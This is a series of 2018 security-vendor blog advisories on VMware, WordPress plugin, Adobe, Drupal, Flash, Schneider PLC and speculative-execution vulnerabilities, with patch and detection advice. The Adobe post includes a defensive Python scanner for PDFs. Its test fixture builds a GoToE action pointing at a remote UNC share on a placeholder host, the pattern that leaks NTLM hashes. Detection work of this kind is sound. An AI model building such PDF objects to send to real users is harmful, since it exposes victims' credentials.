<p>VMware’s Security Advisory includes patch availability details for consumers and businesses. Tenable’s Security Response team strongly encourages patching VMware ESXi versions and upgrading VMware Workstation and VMware Fusion using the table below:</p>
<p><img src="/sites/drupal.dmz.tenablesecurity.com/files/images/blog/vmware_patch_vers_0.PNG" width="753" height="798" alt="" /></p>
<p>Source: <a href="https://www.vmware.com/security/advisories/VMSA-2018-0027.html">VMware Security Advisory </a></p>
<h2>Identifying affected systems</h2>
<p>A list of Tenable plugins to identify this vulnerability will appear <a href="https://www.tenable.com/plugins/search?q=cves%3A(%22CVE-2018-6981%22%20OR%20%22CVE-2018-6982%22)&amp;sort=&amp;page=1">here</a> as they’re released.</p>
<h2>Get more information</h2>
<ul>
<li><a href="https://www.vmware.com/security/advisories/VMSA-2018-0027.html">VMware Security Advisories: VMSA-2018-0027</a></li>
<li><a href="https://twitter.com/ChaitinTech/status/1057526019127676929">Video Demo of Guest-to-Host Escape by Chaitin Tech</a></li>
</ul>
<p><b><i>Learn more about <a href="https://www.tenable.com/products">Tenable</a>, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a <a href="https://www.tenable.com/products/tenable-io/vulnerability-management/eva... 60-day trial</a> of Tenable.io Vulnerability Management. </i></b></p>

New WordPress Privilege Escalation Flaw In WP GDPR Compliance Plugin


<p>A privilege escalation flaw in WordPress’ popular WP GDPR Compliance plugin has led to exploitation of numerous WordPress sites. Site owners and administrators are encouraged to upgrade to the latest version of the affected plugin.</p>
<h2>Background</h2>
<p>WordPress plugin "<a href="https://wordpress.org/plugins/wp-gdpr-compliance/">WP GDPR Compliance</a>" versions before 1.4.3 are vulnerable to a privilege escalation attack. The attack doesn’t require authentication, and <a href="https://blog.sucuri.net/2018/11/erealitatea-net-hack-corrupts-websites-w... reports that attackers have already exploited a number of sites. Exploited sites had their siteurls changed to "hxxp://erealitatea[.]net".</p>
<h2>Impact assessment</h2>
<p>As of noon ET on November 12, a curated Google search shows approximately 7,600 sites whose site URL was changed to 'erealitatea[.]net'. The malicious site appears to have been taken down, but when administrators and users attempt to interact with their WordPress sites, most of the sites will completely fail to load or will crash when administrators attempt to edit.</p>
<h2>Vulnerability details </h2>
<p>The affected plugin normally handles access and delete requests that are required for GDPR compliance, but versions of this plugin before 1.4.3 don’t properly sanitize the 'save_setting' action. Because of that, an attacker can inject arbitrary commands, which get stored until the plugin reaches its 'do_action()' call.</p>
<img src="/sites/drupal.dmz.tenablesecurity.com/files/images/blog/WP%20GDPR%20Compliance%20Plugin.jpg" width="1000" height="859" alt="A privilege escalation flaw in WordPress’ popular WP GDPR Compliance plugin has led to exploitation of numerous WordPress sites." />
<p><i>Source: <a href="https://www.wordfence.com/blog/2018/11/privilege-escalation-flaw-in-wp-g...
<p>With these flaws, an attacker can gain administrative access to the site and make direct changes, including uploading malicious plugins for additional attacks.</p>
<h2>Urgently required actions</h2>
<p>If a site has been attacked, administrators can manually edit the site’s <b>wp_options</b> database table to fix the URL. The row whose <b>option_name</b> is “siteurl” holds the site URL; admins can correct the domain in that row’s <b>option_value</b> field.</p>
<p>With the URL fixed, the site should load normally, but we highly recommend checking for any malicious changes or uploads to the site, or restoring the site from an uncompromised backup. Once that step has been performed, site admins should immediately update the affected plugin to the latest version.</p>
<h2>Identifying affected systems</h2>
<p>A list of Tenable plugins to identify this vulnerability will appear <a href="https://www.tenable.com/plugins/search?q=cves%3A(%22CVE-2018-19207%22)&sort=&page=1">here</a> as they’re released.</p>
<h2>Get more information</h2>
<ul><li><a href="https://blog.sucuri.net/2018/11/erealitatea-net-hack-corrupts-websites-w... Blog</a></li>
<li><a href="https://www.wordfence.com/blog/2018/11/privilege-escalation-flaw-in-wp-g... technical blog</a></li>
<li><a href="https://wordpress.org/plugins/wp-gdpr-compliance/">WP GDPR Plugin page</a></li></ul></p>
<p><b><i>Learn more about <a href="https://www.tenable.com/products">Tenable</a>, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a <a href="https://www.tenable.com/products/tenable-io/vulnerability-management/eva... 60-day trial</a> of Tenable.io Vulnerability Management. </i></b></p>


Adobe Patches Incomplete Fix for NTLM Credential Leaking Bug (CVE-2018-15979)


Researchers have reported an incomplete fix for CVE-2018-4993, an NTLM credential leaking vulnerability that was supposed to be patched in May 2018. Adobe has now released a complete fix.

Background

On November 13, Adobe published its monthly security bulletins as part of its monthly release cycle in conjunction with Microsoft’s Patch Tuesday. The November security bulletins include a fix for a vulnerability that was believed to have been patched in May 2018’s security bulletins. However, security researchers at EdgeSpot discovered that the May 2018 fix was incomplete.

Vulnerability details

Researchers at Check Point Software Technologies originally reported this vulnerability to Adobe earlier in 2018. The vulnerability, CVE-2018-4993, is an information disclosure bug that leaks NT LAN Manager (NTLM) credentials through a feature of Portable Document Format (PDF) files that allows embedding remote documents and files. The credentials can be leaked when an attacker sends a specially crafted PDF file to a victim; the leaked data includes the NTLM hash and challenge along with user and domain details.

Source: Checkpoint

Adobe reportedly patched this vulnerability in May 2018 as part of its security bulletin, APSB18-09. However, researchers at EdgeSpot, makers of an exploit detection service, determined that the May 2018 patch for CVE-2018-4993 was incomplete. The researchers examined two malicious PDF files (here and here) submitted to VirusTotal in May 2018 and determined that the vulnerability still works against the latest version of Adobe Reader.

It appears that when Adobe issued their patch for this vulnerability in May 2018, it only patched one of two action types required when embedding remote documents and files. The two action types are:

  • GoToR (GoToRemote)
  • GoToE (GoToEmbedded)

EdgeSpot researchers say Adobe only patched GoToR and not GoToE, based on the malicious PDF files they examined, both of which contained the GoToE action type. After reporting this to Adobe in early November, it was identified as a new CVE, CVE-2018-15979, and patched in Adobe’s November security bulletins.
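As an added example (not code from the page, EdgeSpot or Adobe), here is a small Python scanner that flags PDFs whose GoToR or GoToE actions point at a remote file specification, which is the pattern behind this NTLM leak. It scans plain objects and inflates Flate-compressed streams, handles only literal-string file specifications, and uses sample PDF bytes constructed inline (the UNC host 203.0.113.10 is a documentation-range placeholder).

```python
import re
import zlib
from dataclasses import dataclass
from typing import Iterator, List

# An action dictionary of either type discussed above: /S /GoToR or /S /GoToE.
ACTION_RE = re.compile(rb"/S\s*/(GoToR|GoToE)\b")
# /F or /UF file specification written as a literal (...) string; hex strings
# and UTF-16 /UF values are not handled by this simplified scanner.
FSPEC_RE = re.compile(rb"/(?:UF|F)\s*\(((?:[^\\)]|\\.)*)\)", re.DOTALL)
# Stream bodies; Flate-compressed ones are inflated and scanned as well
# (a trailing CR before 'endstream', if present, is ignored by zlib).
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\nendstream", re.DOTALL)


@dataclass
class RemoteAction:
    kind: str    # "GoToR" or "GoToE"
    target: str  # decoded file specification
    offset: int  # byte offset of the action within the scanned buffer


def _decode_literal(raw: bytes) -> str:
    """Decode a PDF literal string body (simplified: octal escapes not handled)."""
    out, i = bytearray(), 0
    while i < len(raw):
        if raw[i] == 0x5C and i + 1 < len(raw):  # backslash escape
            out.append({0x6E: 0x0A, 0x72: 0x0D, 0x74: 0x09}.get(raw[i + 1], raw[i + 1]))
            i += 2
        else:
            out.append(raw[i])
            i += 1
    return out.decode("latin-1")


def _enclosing_dict(buf: bytes, pos: int) -> bytes:
    """Innermost << ... >> dictionary containing byte offset pos (b"" if none)."""
    depth, i = 0, pos
    while i >= 0:  # walk back to the unmatched '<<'
        pair = buf[i:i + 2]
        if pair == b"<<" and depth == 0:
            break
        depth += (pair == b">>") - (pair == b"<<")
        i -= 2 if pair in (b"<<", b">>") else 1
    else:
        return b""
    start, depth, j = i, 0, i
    while j < len(buf) - 1:  # walk forward to the matching '>>'
        pair = buf[j:j + 2]
        depth += (pair == b"<<") - (pair == b">>")
        j += 2 if pair in (b"<<", b">>") else 1
        if depth == 0:
            return buf[start:j]
    return buf[start:]


def is_remote_filespec(spec: str) -> bool:
    """UNC paths, protocol-relative paths and URLs all point off the local host."""
    s = spec.strip()
    return s.startswith("\\\\") or s.startswith("//") or "://" in s


def _buffers(pdf: bytes) -> Iterator[bytes]:
    yield pdf
    for m in STREAM_RE.finditer(pdf):
        try:
            yield zlib.decompress(m.group(1))
        except zlib.error:
            continue  # not Flate-encoded; nothing further to scan here


def find_remote_actions(pdf: bytes) -> List[RemoteAction]:
    """Report every GoToR/GoToE action whose file specification is remote."""
    found = []
    for buf in _buffers(pdf):
        for m in ACTION_RE.finditer(buf):
            d = _enclosing_dict(buf, m.start())
            url_fs = re.search(rb"/FS\s*/URL", d) is not None  # explicit URL file spec
            for fm in FSPEC_RE.finditer(d):
                spec = _decode_literal(fm.group(1))
                if url_fs or is_remote_filespec(spec):
                    found.append(RemoteAction(m.group(1).decode(), spec, m.start()))
                    break
    return found


# Constructed sample objects (not taken from any real file). 203.0.113.10 is a
# documentation-range address standing in for an attacker-controlled SMB host.
REMOTE_ACTION_OBJ = (rb"4 0 obj << /Type /Action /S /GoToE "
                     rb"/F (\\\\203.0.113.10\\share\\doc.pdf) /D [0 /Fit] >> endobj" + b"\n")
LOCAL_ACTION_OBJ = (rb"5 0 obj << /Type /Action /S /GoToR "
                    rb"/F (archive/report.pdf) /D [0 /Fit] >> endobj" + b"\n")
HEADER = b"%PDF-1.7\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
TRAILER = b"trailer << /Root 1 0 R >>\n%%EOF\n"


def sample_pdf(compressed: bool = False) -> bytes:
    """Minimal PDF with both actions, optionally hidden inside a Flate stream."""
    body = REMOTE_ACTION_OBJ + LOCAL_ACTION_OBJ
    if compressed:
        data = zlib.compress(body)
        body = (b"6 0 obj << /Length %d /Filter /FlateDecode >>\nstream\n" % len(data)
                + data + b"\nendstream\nendobj\n")
    return HEADER + body + TRAILER
```

Calling `find_remote_actions(sample_pdf(True))` returns the single GoToE action with the UNC target, while the local GoToR reference is ignored; a positive result is a reason to quarantine the file, not proof of exploitation.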

Urgently required actions

Customers and users are strongly advised to upgrade to the latest versions of Adobe Acrobat and Acrobat Reader, which can be found here.

Identifying affected systems

A list of Nessus plugins to identify this vulnerability can be found here.

Get more information

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

5W1H: Speculative Side Channel Vulnerabilities De-mystified


<p>The classes of vulnerabilities that brought us Meltdown and Spectre are not going away anytime soon. Here’s what you need to know about Speculative Execution vulnerabilities, with our guidance on steps you can take to reduce your risk.</p>
<p>Spectre and Meltdown generated a lot of confusion and discussion in the security world when they first hit the news. Understanding the risks associated with speculative execution vulnerabilities will help organizations prioritize and communicate effectively about their exposure. In this post, we present what is known, how it affects companies and ways to stay ahead in the game.</p>
<h2>Start from the beginning…</h2>
<p>Speculative Execution is a technique used to enhance processor performance by anticipating which instructions will be required. <a href="https://newsroom.intel.com/wp-content/uploads/sites/11/2018/01/Intel-Ana... to Intel</a>, this helps minimize latency and extract greater parallelism, thereby leading to performance gains. The boost in performance comes with a tradeoff: results will be discarded if they are not needed. The technique is used by various microprocessor vendors including Intel, AMD and ARM.</p>
<p>While academic papers dating back to 1985 have covered theoretical attacks on CPU caches and translation lookaside buffers (TLBs), <a href="https://bugzilla.redhat.com/show_bug.cgi?id=1519780#c0">rumors</a> about the existence of vulnerabilities in the wild that leveraged Speculative Execution began surfacing in late 2017. However, the real saga began publicly on January 3, 2018 when a blog post from <a href="https://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory...’s Project Zero Initiative</a> detailed their findings. <a href="https://www.tenable.com/blog/the-first-major-security-logos-of-2018-spec...">Spectre and Meltdown were unleashed to the public</a> just as people were coming back from their New Year holiday. The reports included three variants of the vulnerabilities: CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2) for <a href="https://spectreattack.com/spectre.pdf">Spectre</a> and CVE-2017-5754 (Variant 3) for <a href="https://meltdownattack.com/meltdown.pdf">Meltdown</a>. </p>
<p>This mega-event sparked a huge discussion in the community for various reasons: the impact of the vulnerabilities themselves; the number of vendors affected directly and indirectly at various levels of the supply chain; the sheer number of systems impacted worldwide; and the mammoth task of getting these systems updated (if at all possible). Clearly, Pandora’s box had been opened and there was no going back. Pundits predicted (accurately!) we would see more of these in the months and years to come. </p>
<p>In late May 2018, two more vulnerabilities were discovered and reported by <a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-s... and Google</a>. These were tagged Variant 3A (CVE-2018-3640) and Variant 4 (CVE-2018-3639). The <a href="https://www.tenable.com/blog/spectre-and-meltdown-still-haunting-intelamd">fourth variant</a> presented a new method for leaking information from a system and could be exploited from a browser, thereby enhancing the ease of exploitation. These variants are part of eight additional Spectre-class flaws provisionally named Spectre-NG. </p>
<p>Soon to follow were other flaws from the Spectre-NG class: Lazy FP State Restore (CVE-2018-3665); Bounds Check Bypass Store (BCBS) aka Spectre 1.1 (CVE-2018-3693); Spectre 1.2; ret2spec (aka Spectre v5); and SpectreRSB (Return Stack Buffer).</p>
<p>In July 2018, <a href="https://mlq.me/download/netspectre.pdf">NetSpectre</a> surfaced and changed the scope in terms of exploitability of the Spectre family: a remote attack was now possible. By virtue of this new vulnerability, reported by researchers of the Graz University of Technology, an exposed Network Interface or API would be enough for an attacker to execute the remote side-channel attack. NetSpectre is capable of leaking information from the target system and even though the rate of transmission is low (around 15 to 60 bits per hour in a local network) it is still proof that novel variations of speculative execution can target a broad range of devices.</p>
<p>Most recently, on August 14, a new set of vulnerabilities dubbed <a href="https://foreshadowattack.eu/">Foreshadow</a> and Foreshadow-NG were made public. The new set of vulnerabilities exploiting a <a href="https://www.tenable.com/blog/foreshadow-speculative-execution-attack-tar... attack causing a L1 Terminal Fault</a> could affect processors, Virtual Machines and Cloud environments. These vulnerabilities can be triggered when accessing a linear or logical address that is not mapped to a physical location on the hardware resulting in a Terminal Fault. </p>
<h2>So what difference does it make?</h2>
<p>Spectre and Meltdown opened a broad discussion in regards to the current state of security and their implications. With the remarkably large number of systems vulnerable to speculative execution attacks, and the closing gap between Proofs of Concepts and <a href="https://blog.malwarebytes.com/security-world/2018/01/meltdown-and-spectr..., it’s imperative that security teams and companies collaborate to keep an eye on and be aware of the evolution of these threats.</p>
<p>Speculative Execution vulnerabilities not only affect microprocessor manufacturers, but the whole security community. Some of the discovered vulnerabilities will not be fully patched until new architectures are developed and deployed, which will take a few years to happen. More vulnerabilities will be discovered in the upcoming months and years expanding on the current attack vectors. </p>
<h2>Why is this important?</h2>
<ul><li>The Spectre and Meltdown vulnerabilities affect a very large number and wide range of devices, including computers, mobile devices and servers. Given the widespread nature, it is certain that not all affected systems will ever actually be patched.</li>
<li>These classes of vulnerabilities are not going away anytime soon. While some of these vulnerabilities have been mitigated by software patches provided by different vendors, this has come at the cost of performance, and, in some cases, holistic fixes have required architectural changes.</li>
<li>New, but related vulnerabilities will be discovered, unveiling novel types of attacks that might not be possible to patch via software alone.</li></ul>
<h2>What you can do…</h2>
<p>Keeping up to date with information on new vulnerabilities and mitigating them via software patches or microcode provides a first line of defense. </p>
<p>Knowing how you are exposed can help to manage and mitigate risks associated with vulnerabilities. By visualizing, analyzing and measuring cyber risk, one can confidently manage and reduce it to an acceptable level. </p>
<p>Security teams must become proactive to close the gap between the publication of a new vulnerability and becoming aware that it is present in their ecosystem. As per <a href="https://www.tenable.com/cyber-exposure/attackers-advantage">Tenable Research’s report</a> on the Attacker’s Advantage, 34% of the analyzed vulnerabilities had an exploit available on the day they were disclosed. Teams willing to protect their organization’s infrastructure can be a step ahead of the curve and reduce the seven-day window of opportunity attackers have to exploit a given vulnerability.</p>
<p>On our part, we will keep you updated on the saga of speculative side channel vulnerabilities as things evolve. Stay tuned! </p>
<h2>Learn more:</h2>
<ul><li><a href="https://www.darkreading.com/attacks-breaches/new-side-channel-attacks-ta... Side-Channel Attacks Target Graphics Processing Units</a></li>
<li><a href="https://www.zdnet.com/article/intel-cpus-impacted-by-new-portsmash-side-... CPUs impacted by new PortSmash side-channel vulnerability</a></li></ul>
<p><b><i>Learn more about <a href="https://www.tenable.com/products">Tenable</a>, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a <a href="https://www.tenable.com/products/tenable-io/vulnerability-management/eva... 60-day trial</a> of Tenable.io Vulnerability Management. </i></b></p>

Popular WordPress ‘AMP for WP’ Plugin Vulnerable to Privilege Escalation Attacks


The ‘AMP for WP – Accelerated Mobile Pages’ plugin for WordPress is vulnerable to a privilege escalation attack. Updating the plugin to version ‘0.9.97.20’ fixes the flaw.

Background

Following the discovery of a critical vulnerability in the WP GDPR Compliance Plugin, another critical WordPress plugin vulnerability was discovered this week in the popular AMP for WP plugin by researchers at WebARX Security. The plugin adds support for Google Accelerated Mobile Pages (AMP), a mobile site acceleration tool, to any WordPress site that has it installed.

Older versions of the plugin are vulnerable to a privilege escalation flaw, which allows WordPress site users of any level to make administrative API calls.

Analysis

WordPress allows all users to make AJAX API calls to manage or invoke various functions they may need to manage their site. However, the older version of this plugin didn’t include a wpnonce check to verify account permissions of the currently logged in user, effectively opening admin API access to anyone with a login for a site.

Admin access for WordPress allows for ad placement, custom HTML, and manual WordPress plugin uploads. From an outsider attack perspective, basic or even guest users are now a potential vector for admin access.

Proof of Concept

Source: WebARX Security

Solution

An updated version of the plugin is available via automatic updates through WordPress. Users can also manually download the plugin update here.

Identifying affected systems

Plugin 101841 will detect any WordPress plugins that are out of date, which includes the AMP for WP plugin, but doesn’t reflect the criticality of this specific issue.

A list of Tenable plugins to identify this vulnerability will appear here as they’re released.

Get more information

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

Shifting Left in the Cybersecurity Defense Lifecycle


<p>Identifying your risk posture should be the first objective of all cybersecurity programs. Yet, this is where organizations often fail, due to weak visibility and understanding during the crucial “identify” phase of the cybersecurity lifecycle. Focusing on protect, detect, respond, recover without an understanding of risk posture leads to failed security strategies.</p>

<p>The cybersecurity defense lifecycle has a <a href="https://www.nist.gov/sites/default/files/documents/2017/12/05/draft-2_fr... Framework</a> created for the purpose of helping organizations reduce and better manage cyber risks. It depicts the phases of a continuous lifecycle on a continuum like so: identify->protect->detect->respond->recover (Figure 1).</p>

<img src="/sites/drupal.dmz.tenablesecurity.com/files/images/blog/Shift%20Left%20in%20the%20NIST%20framework.png" width="975" height="138" alt="The NIST Cybersecurity Framework depicts the phases of a continuous lifecycle on a continuum like so: identify-protect-detect-respond-recover." />
<p><i>Figure 1: NIST Cybersecurity Framework.</i></p>

<p>The cyber defense industry has had a huge focus in recent years on innovations relevant to the protect, detect and respond/recover aspects of this lifecycle. The <a href="https://momentumcyber.com/docs/CYBERscape.pdf">cybersecurity landscape</a> has been exploding with several hundred vendors (~500) in an ever-increasing number of areas and specializations. How do you know whether you need every one of these tools in your toolbox or just a couple?</p>

<p>It all starts with the “identify” stage, which begins with an initial understanding of your own risk posture that then develops into a more comprehensive risk management strategy with a focus on reducing your cyber exposure. This beginning allows for a measured response, rather than a spray-and-pray approach that is unlikely to yield the results you're looking for. Understanding your own risk posture requires getting a continuously updated picture of your assets and information about the importance of those assets, along with a picture of the attack surface exposed by those assets directly or indirectly. Combining this level of insight with the risk introduced by humans -- whether inside or outside your organization -- gives you a much better picture of risk.</p>

<p>In the past, identification of assets was a relatively uncomplicated problem to solve. Your assets were physical assets that you knew, you could touch and, for the most part, they never left the building. As you move from that world into the world of BYOD, IoT, virtual machines, public cloud, containers and now serverless computing, those assets can be increasingly ephemeral and hard to discover and control. Furthermore, there’s been a significant increase in the sheer number of vulnerabilities over the past several years, with last year exhibiting a significant spike and this year on target to come close to or even exceed last year (Figure 2). The ever-changing elastic attack surface created by the evolution of assets from physical to increasingly ephemeral has created a massive gap in an organization’s ability to truly understand its Cyber Exposure at any given time. We call this the <a href="https://www.tenable.com/cyber-exposure">Cyber Exposure gap</a>.</p>

<img src="/sites/drupal.dmz.tenablesecurity.com/files/images/blog/vulnerability%20distribution%20trends%20over%20time.png" width="975" height="371" alt="Vulnerability distribution trends over time (Source: NVD)" />
<p><i>Figure 2: Vulnerability distribution trends over time (Source: NVD).</i></p>

<p>Recent high-profile breaches like Equifax, which was identified as being due to not patching an Apache Struts vulnerability for months, have led to significant focus on accelerating the time it takes to fix vulnerabilities across the corporate landscape.</p>

<p>This isn’t and hasn’t been an easy problem to solve for most organizations. The complexity of dealing with the vulnerabilities found in an organization has been increasing multiplicatively as a result of the sheer number of vulnerabilities across an ever-changing and expanding asset landscape. This is further complicated by having to consider the effect of a large variety of security products that could mitigate a vulnerability under specific circumstances and configurations. Last, but not least, is the fact that the process of fixing these vulnerabilities now also spans a variety of human owners and operators due to the varied nature of assets today.</p>

<p>In addition to the effort required to understand the current cyber exposure of an organization, future technology adoption decisions are also facing security considerations such as:</p>
<ul><li>Will adopting technology X increase risk and how do we mitigate it?</li>
<li>How do I keep a view of my ever-changing cyber risk posture so that I always know where to pay attention?</li>
<li>How do I become more proactive in closing the cyber exposure gap?</li></ul>

<h2>So, where should we start?</h2>

<p>The weakest spots in an organization’s security posture occur at the intersection of attack surface, avenues of attack (attack vectors) and obstacles/ (lack of) controls in place. Identifying these weak spots should be the first objective of all cybersecurity programs. This is also where several fail, due to weak visibility and understanding during that crucial “identify” phase. </p>

<img src="/sites/drupal.dmz.tenablesecurity.com/files/images/blog/Cybersecurity%20finding%20the%20weak%20link.png" width="975" height="404" alt="The weakest spots in an organization’s security posture occur at the intersection of attack surface, avenues of attack (attack vectors) and obstacles/ (lack of) controls in place." />

<p>As a practice, we would all be better off with shifting further left in the lifecycle to address the right problems with the right solutions. That said, it isn’t enough to merely shift left at the start of your program for better cyber hygiene, it has to be an active part of your program, where it is revisited and continuously assessed.</p>

<p><b><i>Where are the top vulnerabilities found in the enterprise? Read the <a href="https://www.tenable.com/cyber-exposure/vulnerability-intelligence">Vulne... Intelligence Report</a> from Tenable Research to find out.</i></b></p>

Drupalgeddon Attacks Continue on Sites Missing Security Updates (CVE-2018-7600, CVE-2018-7602)


Recent attacks targeting Drupal instances vulnerable to Drupalgeddon 2 and Drupalgeddon 3 highlight the importance of identifying and patching vulnerable sites.

Background

In March 2018, Drupal published a security advisory, SA-CORE-2018-002, which addressed a critical Remote Code Execution (RCE) vulnerability with a CVE identifier of CVE-2018-7600. Tenable’s Security Response Team published a blog as well.

A few weeks after the publication of this security advisory, researchers at Check Point Software Technologies and Dofinity published “Uncovering Drupalgeddon 2.0,” providing technical details about CVE-2018-7600. The report included enough information that proof-of-concept (PoC) code began to appear on Github.

One month later, Drupal released SA-CORE-2018-004, a security advisory addressing CVE-2018-7602, another RCE vulnerability which became known as Drupalgeddon 3.

After PoC code for Drupalgeddon was released, attackers began leveraging these vulnerabilities in the wild to implant cryptomining scripts on websites (known as “cryptojacking”) as well as deliver backdoors and password stealing and Remote Access Trojan (RAT) malware.


Despite the availability of patches for both Drupalgeddon 2 and Drupalgeddon 3, there are still unpatched Drupal instances which are being targeted by cybercriminals.

Incident details

On November 19, Trustwave and Imperva published two separate blogs detailing recent attacks leveraging the Drupalgeddon 2 vulnerability.

Trustwave blogged about the discovery of a cryptomining script found on the Make-A-Wish international website which was linked to a known Drupalgeddon 2 campaign dating back to May 2018.

Imperva blogged about a campaign from the end of October that leveraged Drupalgeddon 2 and the Dirty COW (CVE-2016-5195) vulnerability to compromise systems in a persistent manner.

Both of these stories highlight ongoing efforts by cybercriminals to identify and target vulnerable Drupal instances and maintain persistence on compromised systems.

Urgently required actions

It is extremely important to identify Drupal instances that remain unpatched and apply the available patches for SA-CORE-2018-002 and SA-CORE-2018-004 immediately.

Identifying affected systems

A list of Nessus plugins to identify assets vulnerable to Drupalgeddon can be found here.

Get more information

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

Adobe Issues Out-of-Band Patch for Critical Flash Player Vulnerability (CVE-2018-15981)


Adobe has released an out-of-band patch for a critical Flash Player vulnerability. Users are encouraged to upgrade as soon as possible.

Background

On November 20, Adobe released APSB18-44, an out-of-band (OOB) security bulletin to address a zero day vulnerability in Adobe Flash Player versions 31.0.0.148 and earlier for Windows, macOS, Linux and Chrome OS.

This bulletin arrived seven days after Adobe released APSB18-39, its monthly security bulletin for November 2018. On the very same day, November 13, researcher Gil Dabah published a blog discussing his discovery of CVE-2018-15981.

It may not seem like a coincidence that both Adobe’s monthly security bulletin and the researcher’s blog were published on the same day. However, Dabah indicated it may just have been a coincidence after all in a tweet:

Vulnerability details

In his blog, Dabah shares details about CVE-2018-15981, a type confusion vulnerability in Adobe Flash Player. Specifically, the vulnerability exists in the interpreter code for Adobe’s ActionScript Virtual Machine (AVM). According to Dabah, the AVM’s interpreter “does not reset a with-scope pointer when an exception is caught” which leads to the type confusion and “eventually to a remote code execution.”

User interaction is required to exploit this vulnerability. An attacker would need to convince users to visit a malicious website, or compromise a legitimate website or advertising network and inject malicious code into it.

For further technical details about the vulnerability, please visit Dabah’s blog.

Urgently required actions

Upgrade to the latest version of Flash Player for your respective operating system or web browser. Adobe has provided links in the solution section of their security bulletin.

If Adobe Flash is not a requirement in your network or on your devices, you may consider disabling it altogether.

Identifying affected systems

A list of Nessus plugins to identify this vulnerability will appear here as they’re released.

Get more information

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

Tenable Research Advisory: Multiple ICS Vulnerabilities in Schneider Modicon Quantum PLC


Tenable Research discovered multiple vulnerabilities in Schneider’s Modicon Quantum programmable logic controller. Schneider has recommended mitigations for impacted end users.

Background

While examining a Schneider Modicon Quantum programmable logic controller (PLC) Tenable Research discovered several vulnerabilities.

The Modicon Quantum is used for complex process control, safety and infrastructure in industrial settings like manufacturing. Industrial control systems typically include a computer called a programmable logic controller (PLC). PLCs connect directly to instruments, for example valve and pump actuators and motors, that perform industrial processes. They communicate with other PLCs and supervisory control and data acquisition (SCADA) devices, and often connect to operator interfaces, whether local or remote via network communications.

PLCs provide automated functions to manage aspects such as pressure, flow, temperature, motion control and other process variables. They have replaced traditional analogue controls, historically based on mechanical, pneumatic or electronic components, with digital programmable software.

The vulnerabilities we discovered include unauthenticated remote flaws that permit a malicious attacker to delete legitimate accounts and change the password for the admin account. A threat actor can gain full administrator access.

Analysis

Our research focused on the Schneider Modicon Quantum PLC with a 140 NOC77101 Ethernet communication module.

The first two vulnerabilities that we discovered permit an unauthenticated attacker to manipulate user accounts via the built-in web server in the PLC. An attacker can change any user's passwords, including the administrator password (CVE-2018-7811). It is also possible to delete the existing admin username and password (CVE-2018-7809) for the web interface, in the process resetting the web server username and password to USER:USER.

We also discovered two web application vulnerabilities that permit cross-site scripting attacks. In a cross-site scripting (XSS) attack, malicious code is injected into otherwise benign and trusted websites or URLs. The attacker uses the web application to send malicious code, usually in the form of a browser-side script, to a different end user. One of the vulnerabilities is a reflected cross-site scripting flaw (CVE-2018-7810). An attacker can insert JavaScript into the "name" parameter that will then be executed by the client clicking on the crafted link.

The second web application vulnerability is a cross-site request forgery (CSRF) flaw (CVE-2018-7831). An attacker can forge a link to be sent to an authenticated victim. Once clicked, the victim’s password will be changed to a password chosen by the attacker.

Lastly, we also discovered two denial-of-service (DoS) vulnerabilities. One of the DoS vulnerabilities can be triggered by sending a crafted request to the web server and will render the web server inaccessible for around one minute (CVE-2018-7830). The other DoS vulnerability impacts a Schneider Modbus function, and can be used to completely shut down the communication module.

You can find further technical details in the Advisory.

Business impact

Organizations using these devices in ICS and SCADA environments have two key priorities: securing health, safety and the environment and protecting the business processes that matter most. These priorities may pull against one another when it comes to vulnerabilities in hardware like a PLC. These devices provide critical control functionality and cannot be taken offline to be patched, in the event any patch is provided.

Organizations must have visibility into their OT assets and put strong controlling measures in place to mitigate risk. The lifespans of these devices are measured in decades and, because of increasing cost pressures, those lifespans are being stretched even further. This means organizations may have vulnerable devices in sensitive environments for extended periods of time. Visibility and mitigation have to be a top priority.

Solution

Schneider has issued a Security Notification for these vulnerabilities. Because the Quantum product line is end of life, software updates will not be released. Schneider has provided a set of recommendations, including standard mitigations, to protect impacted end users from these vulnerabilities. These mitigations are outlined in the Security Notification and include:

  • Disable the web server by default
  • Configure access control lists to restrict web server access to authorized IP addresses
  • Protect access to Modicon products with network, industrial, and application firewalls

Identifying affected systems

The products affected include all Modicon M340, Premium, Quantum PLCs and BMXNOR0200. Tenable has released a Nessus plugin to detect CVE-2018-7831, which can be found here.

Additional information

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.


CDM DEFEND: Going Mobile


<p>How the CDM DEFEND plan for adding and securing mobile devices will help government agencies improve visibility and security.</p>
<p>“<a href="https://www.youtube.com/watch?v=ToxymSLzJeM">Going Mobile</a>” was a hit song for the British rock band “The Who” in the early 1970s. Celebrating a transient lifestyle, the song captured the public’s imagination because, at the time, society was generally immobile; people were tied to single towns, jobs, and friends and family who rarely ventured far from home.</p>
<p>Fast forward to 2018 and mobility has become the norm. “Telecommuting,” remote work and frequent travel are all part of our daily routines. This mobility brings unique security challenges because we are never traveling alone – we want all of our devices with us and require instant access to the applications we can’t live without.</p>
<p>The Department of Homeland Security (DHS) <a href="https://www.dhs.gov/cdm">Continuous Diagnostics & Mitigation (CDM) Program Office</a>, which is responsible for securing the entire Federal enterprise, has had concerns about the mobile challenge for some time. Now that five of six CDM DEFEND task orders have been awarded (the sixth, Group F, is expected in 2019), the program can focus more on mobility. The DEFEND task orders require awardees to improve visibility and security in the mobile environment. </p>
<p>The <a href="https://www.meritalk.com/articles/cdm-defend-mobile-rfs/">CDM DEFEND plan for adding and securing mobile devices</a> is to develop a partnership approach. In order to meet current standards, Federal agencies have been deploying enterprise mobile solutions, or Mobile Device Management (MDM) platforms. Although it is not the answer to all mobile device security concerns, MDM represents a significant enhancement to mobile device security.</p>
